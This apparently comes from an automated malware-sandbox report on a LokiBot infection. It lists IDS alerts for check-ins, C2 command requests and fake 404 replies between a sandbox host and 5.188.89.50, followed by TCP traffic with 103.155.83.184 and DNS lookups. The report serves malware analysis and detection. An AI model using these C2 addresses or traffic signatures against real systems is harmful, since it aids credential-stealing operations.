                    09/28/21-06:51:54.702146TCP2025483ET TROJAN LokiBot Fake 404 Response80492925.188.89.50192.168.2.22
                    09/28/21-06:51:54.979605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929380192.168.2.225.188.89.50
                    09/28/21-06:51:54.979605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929380192.168.2.225.188.89.50
                    09/28/21-06:51:54.979605TCP2025381ET TROJAN LokiBot Checkin4929380192.168.2.225.188.89.50
                    09/28/21-06:51:54.979605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929380192.168.2.225.188.89.50
                    09/28/21-06:51:55.321450TCP2025483ET TROJAN LokiBot Fake 404 Response80492935.188.89.50192.168.2.22
                    09/28/21-06:51:55.578587TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929480192.168.2.225.188.89.50
                    09/28/21-06:51:55.578587TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929480192.168.2.225.188.89.50
                    09/28/21-06:51:55.578587TCP2025381ET TROJAN LokiBot Checkin4929480192.168.2.225.188.89.50
                    09/28/21-06:51:55.578587TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929480192.168.2.225.188.89.50
                    09/28/21-06:51:55.942092TCP2025483ET TROJAN LokiBot Fake 404 Response80492945.188.89.50192.168.2.22
                    09/28/21-06:51:56.360419TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929580192.168.2.225.188.89.50
                    09/28/21-06:51:56.360419TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929580192.168.2.225.188.89.50
                    09/28/21-06:51:56.360419TCP2025381ET TROJAN LokiBot Checkin4929580192.168.2.225.188.89.50
                    09/28/21-06:51:56.360419TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929580192.168.2.225.188.89.50
                    09/28/21-06:51:56.719525TCP2025483ET TROJAN LokiBot Fake 404 Response80492955.188.89.50192.168.2.22
                    09/28/21-06:51:57.142892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929680192.168.2.225.188.89.50
                    09/28/21-06:51:57.142892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929680192.168.2.225.188.89.50
                    09/28/21-06:51:57.142892TCP2025381ET TROJAN LokiBot Checkin4929680192.168.2.225.188.89.50
                    09/28/21-06:51:57.142892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929680192.168.2.225.188.89.50
                    09/28/21-06:51:57.491221TCP2025483ET TROJAN LokiBot Fake 404 Response80492965.188.89.50192.168.2.22
                    09/28/21-06:51:57.735770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929780192.168.2.225.188.89.50
                    09/28/21-06:51:57.735770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929780192.168.2.225.188.89.50
                    09/28/21-06:51:57.735770TCP2025381ET TROJAN LokiBot Checkin4929780192.168.2.225.188.89.50
                    09/28/21-06:51:57.735770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929780192.168.2.225.188.89.50
                    09/28/21-06:51:58.091069TCP2025483ET TROJAN LokiBot Fake 404 Response80492975.188.89.50192.168.2.22
                    09/28/21-06:51:58.357272TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929880192.168.2.225.188.89.50
                    09/28/21-06:51:58.357272TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929880192.168.2.225.188.89.50
                    09/28/21-06:51:58.357272TCP2025381ET TROJAN LokiBot Checkin4929880192.168.2.225.188.89.50
                    09/28/21-06:51:58.357272TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929880192.168.2.225.188.89.50
                    09/28/21-06:51:58.714416TCP2025483ET TROJAN LokiBot Fake 404 Response80492985.188.89.50192.168.2.22
                    09/28/21-06:51:58.978533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929980192.168.2.225.188.89.50
                    09/28/21-06:51:58.978533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929980192.168.2.225.188.89.50
                    09/28/21-06:51:58.978533TCP2025381ET TROJAN LokiBot Checkin4929980192.168.2.225.188.89.50
                    09/28/21-06:51:58.978533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929980192.168.2.225.188.89.50
                    09/28/21-06:51:59.345117TCP2025483ET TROJAN LokiBot Fake 404 Response80492995.188.89.50192.168.2.22
                    09/28/21-06:51:59.614893TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930080192.168.2.225.188.89.50
                    09/28/21-06:51:59.614893TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930080192.168.2.225.188.89.50
                    09/28/21-06:51:59.614893TCP2025381ET TROJAN LokiBot Checkin4930080192.168.2.225.188.89.50
                    09/28/21-06:51:59.614893TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930080192.168.2.225.188.89.50
                    09/28/21-06:51:59.962508TCP2025483ET TROJAN LokiBot Fake 404 Response80493005.188.89.50192.168.2.22
                    09/28/21-06:52:00.216200TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930180192.168.2.225.188.89.50
                    09/28/21-06:52:00.216200TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930180192.168.2.225.188.89.50
                    09/28/21-06:52:00.216200TCP2025381ET TROJAN LokiBot Checkin4930180192.168.2.225.188.89.50
                    09/28/21-06:52:00.216200TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930180192.168.2.225.188.89.50
                    09/28/21-06:52:00.608646TCP2025483ET TROJAN LokiBot Fake 404 Response80493015.188.89.50192.168.2.22
                    09/28/21-06:52:00.868430TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930280192.168.2.225.188.89.50
                    09/28/21-06:52:00.868430TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930280192.168.2.225.188.89.50
                    09/28/21-06:52:00.868430TCP2025381ET TROJAN LokiBot Checkin4930280192.168.2.225.188.89.50
                    09/28/21-06:52:00.868430TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930280192.168.2.225.188.89.50
                    09/28/21-06:52:01.292342TCP2025483ET TROJAN LokiBot Fake 404 Response80493025.188.89.50192.168.2.22
                    09/28/21-06:52:01.551020TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930380192.168.2.225.188.89.50
                    09/28/21-06:52:01.551020TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930380192.168.2.225.188.89.50
                    09/28/21-06:52:01.551020TCP2025381ET TROJAN LokiBot Checkin4930380192.168.2.225.188.89.50
                    09/28/21-06:52:01.551020TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930380192.168.2.225.188.89.50
                    09/28/21-06:52:01.903731TCP2025483ET TROJAN LokiBot Fake 404 Response80493035.188.89.50192.168.2.22
                    09/28/21-06:52:02.176567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930480192.168.2.225.188.89.50
                    09/28/21-06:52:02.176567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930480192.168.2.225.188.89.50
                    09/28/21-06:52:02.176567TCP2025381ET TROJAN LokiBot Checkin4930480192.168.2.225.188.89.50
                    09/28/21-06:52:02.176567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930480192.168.2.225.188.89.50
                    09/28/21-06:52:02.597537TCP2025483ET TROJAN LokiBot Fake 404 Response80493045.188.89.50192.168.2.22
                    09/28/21-06:52:02.873690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930580192.168.2.225.188.89.50
                    09/28/21-06:52:02.873690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930580192.168.2.225.188.89.50
                    09/28/21-06:52:02.873690TCP2025381ET TROJAN LokiBot Checkin4930580192.168.2.225.188.89.50
                    09/28/21-06:52:02.873690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930580192.168.2.225.188.89.50
                    09/28/21-06:52:03.258859TCP2025483ET TROJAN LokiBot Fake 404 Response80493055.188.89.50192.168.2.22
                    09/28/21-06:52:03.533927TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930680192.168.2.225.188.89.50
                    09/28/21-06:52:03.533927TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930680192.168.2.225.188.89.50
                    09/28/21-06:52:03.533927TCP2025381ET TROJAN LokiBot Checkin4930680192.168.2.225.188.89.50
                    09/28/21-06:52:03.533927TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930680192.168.2.225.188.89.50
                    09/28/21-06:52:03.883480TCP2025483ET TROJAN LokiBot Fake 404 Response80493065.188.89.50192.168.2.22
                    09/28/21-06:52:04.134812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930780192.168.2.225.188.89.50
                    09/28/21-06:52:04.134812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930780192.168.2.225.188.89.50
                    09/28/21-06:52:04.134812TCP2025381ET TROJAN LokiBot Checkin4930780192.168.2.225.188.89.50
                    09/28/21-06:52:04.134812TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930780192.168.2.225.188.89.50
                    09/28/21-06:52:04.492880TCP2025483ET TROJAN LokiBot Fake 404 Response80493075.188.89.50192.168.2.22

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 28, 2021 06:50:21.045789003 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:21.338310003 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.338499069 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:21.338944912 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:21.629554033 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.629590034 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.629606009 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.629622936 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.629757881 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:21.629843950 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:21.919749022 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.919792891 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.919812918 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.919835091 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.919857025 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.920033932 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:21.920475960 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.920603037 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:21.920610905 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.920680046 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:21.920711040 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:21.920805931 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.209595919 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209626913 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209640980 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209656954 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209672928 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209683895 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209698915 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209711075 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209727049 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.209913015 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.211776018 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.211802006 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.211817026 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.211873055 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.211903095 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.211920023 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.211963892 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.211997986 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.212007046 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.212013006 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.212093115 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.498945951 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.498990059 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499027967 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499052048 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499072075 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499092102 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499129057 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.499178886 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499213934 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499219894 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.499233007 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499244928 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499260902 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499274015 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.499289036 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.499304056 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.499313116 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499330044 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.499353886 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.500693083 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.500734091 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.500750065 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.500763893 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.500773907 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.500782013 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.500790119 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.500802994 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.500809908 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.500835896 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.500853062 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.501471043 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.502367973 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.502391100 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.502408981 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.502424955 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.502437115 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.502454042 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.502475977 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.502486944 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.504246950 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.504256964 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.506627083 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.789410114 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.789437056 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.789452076 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.789472103 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.790376902 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.791162014 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.791182995 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.791218996 CEST4916580192.168.2.22103.155.83.184
                    Sep 28, 2021 06:50:22.791230917 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.791244984 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.791258097 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.791271925 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.791285038 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.791301966 CEST8049165103.155.83.184192.168.2.22
                    Sep 28, 2021 06:50:22.791316986 CEST8049165103.155.83.184192.168.2.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 28, 2021 06:50:29.479912043 CEST5216753192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:29.499205112 CEST53521678.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:30.139365911 CEST5059153192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:30.158834934 CEST53505918.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:30.691550970 CEST5780553192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:30.708821058 CEST53578058.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:31.397732973 CEST5903053192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:31.417036057 CEST53590308.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:33.491646051 CEST5918553192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:33.511215925 CEST53591858.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:36.241339922 CEST5561653192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:36.260610104 CEST53556168.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:36.892030001 CEST4997253192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:36.909889936 CEST53499728.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:37.517440081 CEST5177153192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:37.536830902 CEST53517718.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:38.161380053 CEST5986753192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:38.180830956 CEST53598678.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:38.872611046 CEST5031553192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:38.891587973 CEST53503158.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:39.543977022 CEST5007253192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:39.563527107 CEST53500728.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:40.224781036 CEST5430453192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:40.244230032 CEST53543048.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:40.868150949 CEST4989453192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:40.888323069 CEST53498948.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:41.540992975 CEST6464553192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:41.560283899 CEST53646458.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:42.207612038 CEST5374553192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:42.224773884 CEST53537458.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:42.861419916 CEST5435853192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:42.881131887 CEST53543588.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:43.562501907 CEST6501753192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:43.582062006 CEST53650178.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:44.223608017 CEST5834153192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:44.243088961 CEST53583418.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:44.894368887 CEST5638353192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:44.913645983 CEST53563838.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:45.510138988 CEST6217253192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:45.527900934 CEST53621728.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:46.159521103 CEST6085953192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:46.180366993 CEST53608598.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:46.836015940 CEST5905553192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:46.855447054 CEST53590558.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:47.470155001 CEST6006453192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:47.487868071 CEST53600648.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:48.125072002 CEST5168953192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:48.142239094 CEST53516898.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:48.797341108 CEST5500053192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:48.814738035 CEST53550008.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:49.456911087 CEST6418753192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:49.475914955 CEST53641878.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:50.103096962 CEST5944953192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:50.121701002 CEST53594498.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:50.736572981 CEST5842453192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:50.756259918 CEST53584248.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:51.573493958 CEST6243153192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:51.593106031 CEST53624318.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:52.347374916 CEST5287953192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:52.364711046 CEST53528798.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:53.273158073 CEST6007453192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:53.292803049 CEST53600748.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:53.927613974 CEST5150653192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:53.947679043 CEST53515068.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:54.591924906 CEST5061553192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:54.610177994 CEST53506158.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:55.214793921 CEST5901253192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:55.233603954 CEST53590128.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:55.894778967 CEST6273853192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:55.914731026 CEST53627388.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:56.533139944 CEST5999253192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:56.553797007 CEST53599928.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:57.189132929 CEST5412853192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:57.208435059 CEST53541288.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:57.797666073 CEST5286053192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:57.814928055 CEST53528608.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:58.491209030 CEST6174253192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:58.513585091 CEST53617428.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:59.137286901 CEST5310653192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:59.156528950 CEST53531068.8.8.8192.168.2.22
                    Sep 28, 2021 06:50:59.792362928 CEST5107153192.168.2.228.8.8.8
                    Sep 28, 2021 06:50:59.811640024 CEST53510718.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:00.442684889 CEST5522553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:00.464709044 CEST53552258.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:01.097755909 CEST5182253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:01.118602991 CEST53518228.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:01.767754078 CEST5720653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:01.787070036 CEST53572068.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:02.415457010 CEST6147153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:02.437361002 CEST53614718.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:03.058557987 CEST6258453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:03.081188917 CEST53625848.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:03.716505051 CEST5415153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:03.737246037 CEST53541518.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:04.366527081 CEST6531753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:04.384134054 CEST53653178.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:04.998681068 CEST5772253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:05.019469976 CEST53577228.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:05.614173889 CEST6471553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:05.631485939 CEST53647158.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:06.227550030 CEST5620753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:06.246737957 CEST53562078.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:06.860356092 CEST6496353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:06.881524086 CEST53649638.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:07.506026983 CEST6537953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:07.525409937 CEST53653798.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:08.143147945 CEST5623353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:08.162851095 CEST53562338.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:08.750855923 CEST6070653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:08.768567085 CEST53607068.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:09.357036114 CEST4936653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:09.376465082 CEST53493668.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:09.988940001 CEST5014153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:10.008641958 CEST53501418.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:10.594608068 CEST5206953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:10.613387108 CEST53520698.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:11.237409115 CEST6378853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:11.259166002 CEST53637888.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:11.828600883 CEST5319053192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:11.848179102 CEST53531908.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:12.454752922 CEST5671953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:12.473819017 CEST53567198.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:13.094235897 CEST5758453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:13.111699104 CEST53575848.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:13.729536057 CEST5081553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:13.746982098 CEST53508158.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:14.335000992 CEST5809353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:14.354599953 CEST53580938.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:14.965274096 CEST6090253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:14.985114098 CEST53609028.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:15.632652044 CEST5371053192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:15.652194977 CEST53537108.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:16.251604080 CEST5890853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:16.271156073 CEST53589088.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:16.858936071 CEST5034653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:16.878494978 CEST53503468.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:17.496031046 CEST6022153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:17.515573025 CEST53602218.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:18.093348026 CEST5571353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:18.112341881 CEST53557138.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:18.739155054 CEST6339853192.168.2.228.8.8.8
